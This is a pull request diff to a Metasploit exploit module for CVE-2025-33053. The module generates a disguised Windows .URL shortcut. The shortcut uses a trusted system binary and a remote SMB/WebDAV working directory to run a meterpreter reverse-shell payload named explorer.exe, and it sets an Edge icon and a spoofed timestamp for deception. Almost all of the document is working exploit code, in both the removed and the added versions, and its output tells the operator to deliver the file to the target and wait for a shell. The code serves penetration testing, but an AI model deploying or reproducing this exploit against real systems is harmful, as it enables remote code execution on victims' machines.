Merge pull request rapid7#1 from msutovsky-r7/collab/webdav_working_dir_exploit

Internet Shortcut UNC Module Upgrade

Author: DevBuiHieu

modules/exploits/windows/fileformat/cve_2025_33053.rb

@@ -1,9 +1,16 @@
-# frozen_string_literal: true
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
-# Metasploit module to exploit CVE-2025-33053 via malicious .URL and WebDAV payload hosting.
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::Remote::SMB::Server::HashCapture
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
   def initialize(info = {})
     super(
       update_info(
@@ -17,114 +24,79 @@ def initialize(info = {})
           potentially resulting in remote code execution via a trusted binary.
         },
 
-        'Author' => ['Dev Bui Hieu'],
+        'Author' => [
+          'Alexandra Gofman', # vuln research
+          'David Driker', # vuln research
+          'Dev Bui Hieu' # module dev
+        ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2025-06-11',
         'References' => [
           ['CVE', '2025-33053'],
           ['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
         ],
         'Platform' => 'win',
-        'Arch' => ARCH_X64,
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Passive' => true,
         'Targets' => [['Windows (generic)', {}]],
+        'DefaultOptions' => {
+          'FOLDER_NAME' => 'webdav',
+          'FILE_NAME' => 'explorer.exe',
+          'DisablePayloadHandler' => false,
+          'Payload' => 'windows/x64/meterpreter/reverse_tcp'
+        },
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'SideEffects' => [IOC_IN_LOGS],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )
 
     register_options(
       [
-        OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
-        OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
-        OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
-        OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
-        OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
-      ]
-    )
-    register_advanced_options(
-      [
-        OptString.new('LOLBAS_EXE',
-                      [true, 'Path to trusted binary (LOLBAS)', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
-        OptString.new('ICON_PATH',
-                      [true, 'Icon file path', 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe']),
-        OptInt.new('ICON_INDEX', [true, 'Icon index in icon file', 13]),
-        OptString.new('MODIFIED_HEX', [true, 'Modified timestamp in hex', '20F06BA06D07BD014D'])
-      ]
+        OptString.new('OUTFILE', [false, 'Output URL file name', '']),
+      ], self.class
     )
   end
 
-  def exploit
-    prepare_webdav_dir
-    generate_payload_if_needed
-    write_url_file
-    print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
-  end
+  def exploit_remote_load
+    start_service
+    print_status('The SMB service has been started.')
 
-  def prepare_webdav_dir
-    print_status('Creating WebDAV directory if not exists...')
-    FileUtils.mkdir_p(datastore['WEBDAV_DIR']) unless File.directory?(datastore['WEBDAV_DIR'])
-  rescue Errno::EACCES
-    fail_with(Failure::NoAccess,
-              "Cannot create WebDAV directory. Permission denied.\n" \
-              "Try restarting Metasploit with sudo or change ownership of #{datastore['WEBDAV_DIR']}.")
+    self.file_contents = generate_payload_exe
   end
 
-  def generate_payload_if_needed
-    return unless datastore['GEN_PAYLOAD']
-
-    exe_path = File.join(datastore['WEBDAV_DIR'], datastore['PAYLOAD_NAME'])
-    print_status('Generating payload...')
-    generate_payload_exe(datastore['PAYLOAD'], datastore['LHOST'], datastore['LPORT'], exe_path)
-  end
+  def exploit
+    write_url_file
+    exploit_remote_load
 
-  def generate_payload_exe(payload_name, lhost, lport, output_path)
-    payload = framework.payloads.create(payload_name.to_s.strip)
-    payload.datastore['LHOST'] = lhost
-    payload.datastore['LPORT'] = lport
-    raw = payload.generate
-    exe = Msf::Util::EXE.to_win32pe(framework, raw)
-    write_exe_file(output_path, exe)
-  end
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
 
-  def write_exe_file(path, exe)
-    File.open(path, 'wb') { |f| f.write(exe) }
-    print_good("Payload successfully written to #{path}")
-  rescue Errno::EACCES
-    return_error(path)
+      Rex::ThreadSafe.sleep(1)
+    end
   end
 
   def write_url_file
     content = generate_url_content
-    outfile = datastore['OUTFILE']
-    begin
-      print_status('Generating .URL file...')
-      File.write(outfile, content)
-      print_good(".URL file written to: #{outfile}")
-    rescue Errno::EACCES
-      return_error(File.expand_path(outfile))
-    end
+    outfile = %(#{Rex::Text.rand_text_alphanumeric(8)}.url)
+    path = store_local('webdav.url', nil, content, outfile)
+    print_status("URL file: #{path}, deliver to target's machine and wait for shell")
   end
 
   def generate_url_content
-    unc_path = "\\\\#{datastore['LHOST']}\\#{File.basename(datastore['WEBDAV_DIR'])}\\"
     <<~URLFILE
       [InternetShortcut]
-      URL=#{datastore['LOLBAS_EXE']}
-      WorkingDirectory=#{unc_path}
+      URL=C:\\Windows\\System32\\CustomShellHost.exe
+      WorkingDirectory=\\\\#{srvhost}\\#{share}\\#{folder_name}\\
       ShowCommand=7
-      IconIndex=#{datastore['ICON_INDEX']}
-      IconFile=#{datastore['ICON_PATH']}
-      Modified=#{datastore['MODIFIED_HEX']}
+      IconIndex=13
+      IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
+      Modified=20F06BA06D07BD014D
     URLFILE
   end
-
-  def return_error(currentpath)
-    fail_with(Failure::NoAccess,
-              "Cannot write to #{currentpath}. Permission denied.\n" \
-              'Try restarting Metasploit with root privilege.')
-  end
 end